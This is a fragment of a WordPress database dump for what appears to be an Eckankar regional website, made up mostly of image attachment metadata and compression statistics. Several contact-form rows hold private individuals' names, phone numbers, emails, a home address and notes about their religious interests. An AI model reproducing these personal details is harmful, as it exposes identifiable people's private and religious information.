:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:90565;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:35:\"cropped-favicon-gold-lg-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56109;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:35:\"cropped-favicon-gold-lg-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33695;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:35:\"cropped-favicon-gold-lg-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:30567;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:33:\"cropped-favicon-gold-lg-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2607;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177951,268103,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:158538;s:12:\"smushed-size\";i:50200;s:15:\"savings-percent\";d:68.34;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:158538;s:10:\"compressed\";i:50200;}s:6:\"medium\";a:2:{s:8:\"original\";i:66483;s:10:\"compressed\";i:22634;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:23418;s:10:\"compressed\";i:8773;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:105830;s:10:\"compressed\";i:34681;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:76273;s:10:\"compressed\";i:25508;}s:8:\"tileview\";a:2:{s:8:\"original\";i:90565;s:10:\"compressed\";i:30520;}s:13:\"site_icon-270\";a:2:{s:8:\"original\";i:56109;s:10:\"compressed\";i:19190;}s:13:\"site_icon-192\";a:2:{s:8:\"original\";i:33695;s:10:\"compressed\";i:11970;}s:13:\"site_icon-180\";a:2:{s:8:\"original\";i:30567;s:10:\"compressed\";i:11066;}s:12:\"site_icon-32\";a:2:{s:8:\"original\";i:2607;s:10:\"compressed\";i:1852;}}}'),(177926,268077,'smush-complete',''),(177911,268087,'_field_97','Nick'),(175976,267760,'_field_30','Russ'),(175977,267760,'_field_31','Rodnick'),(175978,267760,'_field_32','(512) 736-6650'),(175979,267760,'_field_33','rodnick.russ1951@hotmail.com'),(175980,267760,'_field_34','7910 GAULT STREET, APT 205'),(175981,267760,'_field_35','AUSTIN'),(175982,267760,'_field_36','TX'),(175983,267760,'_field_37','US'),(175984,267760,'_field_39','I would like to receive updates generally but specifically too, for the HI Retreat. \n\nBe in Eck,\nRuss'),(175985,267760,'_form_id','4'),(175986,267760,'_seq_num','28'),(175987,267761,'_field_133','Virginia'),(175988,267761,'_field_134','Kennette'),(175989,267761,'_field_135','livehu@cox.net'),(175990,267761,'_field_137','H. I retreat'),(175991,267761,'_field_138','Hi,\n\nI would like information on your H. I. Retreat, I believe in April. I heard about it in Tx retreat this past weekend, January 20th. Thank you Virginia Kennette '),(175992,267761,'_form_id','13'),(175993,267761,'_seq_num','130'),(175994,267762,'_field_133','debbie'),(175995,267762,'_field_134','baron'),(175996,267762,'_field_135','eckartisan@aol.com'),(175997,267762,'_field_137','HI retreat'),(175998,267762,'_field_138','Hello, I\'d like some info on the HI retreat in April this year.  A few friends and I would like to attend.  Thanks!  Debbie Baron'),(175999,267762,'_form_id','13'),(176000,267762,'_seq_num','131'),(176001,267763,'_field_179','Kari'),(176002,267763,'_field_180','Morandi'),(176003,267763,'_field_181','kmorandi@comcast.net'),(176004,267763,'_field_182','UT'),(176005,267763,'_field_183','US'),(176006,267763,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(176007,267763,'_form_id','17'),(176008,267763,'_seq_num','14'),(176009,267764,'_field_30','Jorge'),(176010,267764,'_field_31','Santiago'),(176011,267764,'_field_32','(385) 382-3108'),(176012,267764,'_field_33','jiuuumaluk@gmail.com'),(176013,267764,'_field_34','2352 Jefferson Ave.'),(176014,267764,'_field_35','Ogden'),(176015,267764,'_field_36','UT'),(176016,267764,'_field_37','US'),(176017,267764,'_field_39','I\'m interested in signing up for the Arahata Training Class.\nPlease send me the link.'),(176018,267764,'_form_id','4'),(176019,267764,'_seq_num','29'),(176020,267766,'_edit_lock','1682048580:2'),(176021,267766,'_edit_last','2'),(176022,267767,'_wp_attached_file','2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops5360ee316f860e7d82fef76a621e0483.jpg'),(176023,267767,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:102:\"2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops5360ee316f860e7d82fef76a621e0483.jpg\";s:8:\"filesize\";i:5837;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops5360ee316f860e7d82fef76a621e0483-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5253;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176024,267768,'_wp_attached_file','2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops6df2d1d994a10cf0cd0f5578dad1cc3f.jpg'),(176025,267768,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:102:\"2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops6df2d1d994a10cf0cd0f5578dad1cc3f.jpg\";s:8:\"filesize\";i:4950;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops6df2d1d994a10cf0cd0f5578dad1cc3f-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4371;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176026,267769,'_wp_attached_file','2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsbf4263dc33f1c304eb5b0b58a42481ac.jpg'),(176028,267769,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:102:\"2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsbf4263dc33f1c304eb5b0b58a42481ac.jpg\";s:8:\"filesize\";i:6203;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsbf4263dc33f1c304eb5b0b58a42481ac-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5329;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176585,267823,'_wp_attached_file','2023/02/soul-adv-banner-1.png'),(176586,267823,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:584;s:6:\"height\";i:86;s:4:\"file\";s:29:\"2023/02/soul-adv-banner-1.png\";s:8:\"filesize\";i:43261;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"soul-adv-banner-1-300x44.png\";s:5:\"width\";i:300;s:6:\"height\";i:44;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14317;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"soul-adv-banner-1-150x86.png\";s:5:\"width\";i:150;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7860;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:28:\"soul-adv-banner-1-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17518;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:28:\"soul-adv-banner-1-474x86.png\";s:5:\"width\";i:474;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29474;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:28:\"soul-adv-banner-1-391x86.png\";s:5:\"width\";i:391;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22998;}s:8:\"tileview\";a:5:{s:4:\"file\";s:28:\"soul-adv-banner-1-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17518;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176030,267771,'_wp_attached_file','2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsf843e7767bf1b5541a230e05b16f7557.jpg'),(176031,267771,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:102:\"2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsf843e7767bf1b5541a230e05b16f7557.jpg\";s:8:\"filesize\";i:7132;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsf843e7767bf1b5541a230e05b16f7557-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6116;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176032,267767,'_source_url','https://images.unsplash.com/photo-1497366216548-37526070297c?ixlib=rb-0.3.5&q=80&fm=jpg&crop=entropy&cs=tinysrgb&w=150&h=150&fit=crop&s=5360ee316f860e7d82fef76a621e0483&.png'),(176033,267768,'_source_url','https://images.unsplash.com/photo-1504198376073-2ae7974cbbf2?ixlib=rb-0.3.5&q=80&fm=jpg&crop=entropy&cs=tinysrgb&w=150&h=150&fit=crop&s=6df2d1d994a10cf0cd0f5578dad1cc3f&.png'),(176035,267769,'_source_url','https://images.unsplash.com/photo-1486946255434-2466348c2166?ixlib=rb-0.3.5&q=80&fm=jpg&crop=entropy&cs=tinysrgb&w=150&h=150&fit=crop&s=bf4263dc33f1c304eb5b0b58a42481ac&.png'),(176582,267701,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1675447957'),(176037,267771,'_source_url','https://images.unsplash.com/photo-1469208525214-f38e2e5be116?ixlib=rb-0.3.5&q=80&fm=jpg&crop=entropy&cs=tinysrgb&w=150&h=150&fit=crop&s=f843e7767bf1b5541a230e05b16f7557&.png'),(176562,267814,'original-file','2023/02/hands-light-1-updraft-pre-smush-original.jpg'),(176563,267814,'smush-complete','1'),(176564,267814,'smush-info','The file was compressed from 33.10 KB to 29.77 KB saving 10.05 percent using WP-Optimize'),(176565,267814,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:33891;s:12:\"smushed-size\";i:30486;s:15:\"savings-percent\";d:10.05;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:33891;s:10:\"compressed\";i:30486;}s:6:\"medium\";a:2:{s:8:\"original\";i:5972;s:10:\"compressed\";i:5906;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3690;s:10:\"compressed\";i:3624;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:22335;s:10:\"compressed\";i:22335;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:9384;s:10:\"compressed\";i:9318;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:13138;s:10:\"compressed\";i:13138;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:9821;s:10:\"compressed\";i:9755;}s:8:\"tileview\";a:2:{s:8:\"original\";i:11603;s:10:\"compressed\";i:11603;}}}'),(176566,267815,'original-file','2023/02/co-ek-logo-title-2023-updraft-pre-smush-original.png'),(176567,267815,'smush-complete','1'),(176568,267815,'smush-info','The file was compressed from 14.31 KB to 5.09 KB saving 64.4 percent using WP-Optimize'),(176569,267815,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:14653;s:12:\"smushed-size\";i:5216;s:15:\"savings-percent\";d:64.4;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:14653;s:10:\"compressed\";i:5216;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5906;s:10:\"compressed\";i:3014;}}}'),(176570,267810,'original-file','2023/02/blue-butterfly-4-updraft-pre-smush-original.jpg'),(176571,267810,'smush-complete','1'),(176572,267810,'smush-info','The file was compressed from 88.63 KB to 86.31 KB saving 2.61 percent using WP-Optimize'),(176573,267810,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:90758;s:12:\"smushed-size\";i:88385;s:15:\"savings-percent\";d:2.61;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:90758;s:10:\"compressed\";i:88385;}s:6:\"medium\";a:2:{s:8:\"original\";i:16198;s:10:\"compressed\";i:15967;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8202;s:10:\"compressed\";i:8136;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:67819;s:10:\"compressed\";i:67340;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:23881;s:10:\"compressed\";i:23708;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:38324;s:10:\"compressed\";i:37922;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:27939;s:10:\"compressed\";i:27571;}s:8:\"tileview\";a:2:{s:8:\"original\";i:28293;s:10:\"compressed\";i:28205;}}}'),(176581,267701,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(176043,267769,'original-file','2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsbf4263dc33f1c304eb5b0b58a42481ac-updraft-pre-smush-original.jpg'),(176044,267769,'smush-complete','1'),(176045,267769,'smush-info','The file was compressed from 6.06 KB to 5.74 KB saving 5.32 percent using WP-Optimize'),(176046,267769,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:6203;s:12:\"smushed-size\";i:5873;s:15:\"savings-percent\";d:5.32;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:6203;s:10:\"compressed\";i:5873;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5329;s:10:\"compressed\";i:4787;}}}'),(176047,267768,'original-file','2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops6df2d1d994a10cf0cd0f5578dad1cc3f-updraft-pre-smush-original.jpg'),(176048,267768,'smush-complete','1'),(176049,267768,'smush-info','The file was compressed from 4.83 KB to 4.50 KB saving 6.87 percent using WP-Optimize'),(176050,267768,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:4950;s:12:\"smushed-size\";i:4610;s:15:\"savings-percent\";d:6.87;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:4950;s:10:\"compressed\";i:4610;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:4371;s:10:\"compressed\";i:3829;}}}'),(176051,267767,'original-file','2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcrops5360ee316f860e7d82fef76a621e0483-updraft-pre-smush-original.jpg'),(176052,267767,'smush-complete','1'),(176053,267767,'smush-info','The file was compressed from 5.70 KB to 5.33 KB saving 6.49 percent using WP-Optimize'),(176054,267767,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:5837;s:12:\"smushed-size\";i:5458;s:15:\"savings-percent\";d:6.49;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:5837;s:10:\"compressed\";i:5458;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5253;s:10:\"compressed\";i:4711;}}}'),(176055,267734,'original-file','2023/01/heart-in-hand-zoom-updraft-pre-smush-original.jpg'),(176056,267734,'smush-complete','1'),(176057,267734,'smush-info','The file was compressed from 36.88 KB to 35.52 KB saving 3.68 percent using WP-Optimize'),(176058,267734,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:37765;s:12:\"smushed-size\";i:36376;s:15:\"savings-percent\";d:3.68;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:37765;s:10:\"compressed\";i:36376;}s:6:\"medium\";a:2:{s:8:\"original\";i:8347;s:10:\"compressed\";i:8281;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5105;s:10:\"compressed\";i:5039;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:13949;s:10:\"compressed\";i:13949;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:19305;s:10:\"compressed\";i:19305;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:14262;s:10:\"compressed\";i:14262;}s:8:\"tileview\";a:2:{s:8:\"original\";i:17216;s:10:\"compressed\";i:17216;}}}'),(176556,267815,'_wp_attached_file','2023/02/co-ek-logo-title-2023.png'),(176557,267815,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:249;s:6:\"height\";i:56;s:4:\"file\";s:33:\"2023/02/co-ek-logo-title-2023.png\";s:8:\"filesize\";i:14653;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"co-ek-logo-title-2023-150x56.png\";s:5:\"width\";i:150;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5906;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176063,267771,'original-file','2023/01/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw150h150fitcropsf843e7767bf1b5541a230e05b16f7557-updraft-pre-smush-original.jpg'),(176064,267771,'smush-complete','1'),(176065,267771,'smush-info','The file was compressed from 6.96 KB to 6.57 KB saving 5.72 percent using WP-Optimize'),(176066,267771,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:7132;s:12:\"smushed-size\";i:6724;s:15:\"savings-percent\";d:5.72;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:7132;s:10:\"compressed\";i:6724;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6116;s:10:\"compressed\";i:5574;}}}'),(176599,267828,'_wp_attached_file','2023/02/soul-adv-banner-2.png'),(176600,267828,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1061;s:6:\"height\";i:157;s:4:\"file\";s:29:\"2023/02/soul-adv-banner-2.png\";s:8:\"filesize\";i:100439;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"soul-adv-banner-2-300x44.png\";s:5:\"width\";i:300;s:6:\"height\";i:44;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14505;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"soul-adv-banner-2-1024x152.png\";s:5:\"width\";i:1024;s:6:\"height\";i:152;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:87321;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"soul-adv-banner-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9852;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"soul-adv-banner-2-768x114.png\";s:5:\"width\";i:768;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58664;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"soul-adv-banner-2-300x157.png\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17914;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"soul-adv-banner-2-474x157.png\";s:5:\"width\";i:474;s:6:\"height\";i:157;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31498;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"soul-adv-banner-2-391x157.png\";s:5:\"width\";i:391;s:6:\"height\";i:157;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24761;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"soul-adv-banner-2-300x157.png\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17914;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176075,267774,'_wp_attached_file','2023/01/email-whitelist-1.jpg'),(176076,267774,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1080;s:6:\"height\";i:479;s:4:\"file\";s:29:\"2023/01/email-whitelist-1.jpg\";s:8:\"filesize\";i:75635;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"email-whitelist-1-300x133.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9617;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"email-whitelist-1-1024x454.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58497;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"email-whitelist-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6659;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"email-whitelist-1-768x341.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38782;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"email-whitelist-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18190;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"email-whitelist-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28188;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"email-whitelist-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21370;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"email-whitelist-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22086;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176077,267766,'boldgrid_hide_page_title','0'),(176078,267766,'boldgrid_in_page_containers','1'),(176079,267774,'original-file','2023/01/email-whitelist-1-updraft-pre-smush-original.jpg'),(176080,267774,'smush-complete','1'),(176081,267774,'smush-info','The file was compressed from 73.86 KB to 72.42 KB saving 1.95 percent using WP-Optimize'),(176082,267774,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:75635;s:12:\"smushed-size\";i:74160;s:15:\"savings-percent\";d:1.95;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:75635;s:10:\"compressed\";i:74160;}s:6:\"medium\";a:2:{s:8:\"original\";i:9617;s:10:\"compressed\";i:9551;}s:5:\"large\";a:2:{s:8:\"original\";i:58497;s:10:\"compressed\";i:58497;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6659;s:10:\"compressed\";i:6593;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:38782;s:10:\"compressed\";i:38782;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:18190;s:10:\"compressed\";i:18190;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:28188;s:10:\"compressed\";i:28188;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:21370;s:10:\"compressed\";i:21370;}s:8:\"tileview\";a:2:{s:8:\"original\";i:22086;s:10:\"compressed\";i:22086;}}}'),(176083,267776,'_edit_lock','1693865165:2'),(176084,267776,'_edit_last','2'),(176085,267776,'wpsm_accordion_data','s:20186:\"a:9:{i:0;a:4:{s:15:\"accordion_title\";s:21:\"AOL - Whitelist Email\";s:20:\"accordion_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1396:\"<p><strong><span style=\"font-size: 18pt;color: #23507d\">HOW TO WHITELIST AN EMAIL IN AOL</span></strong></p>\r\n<p><span 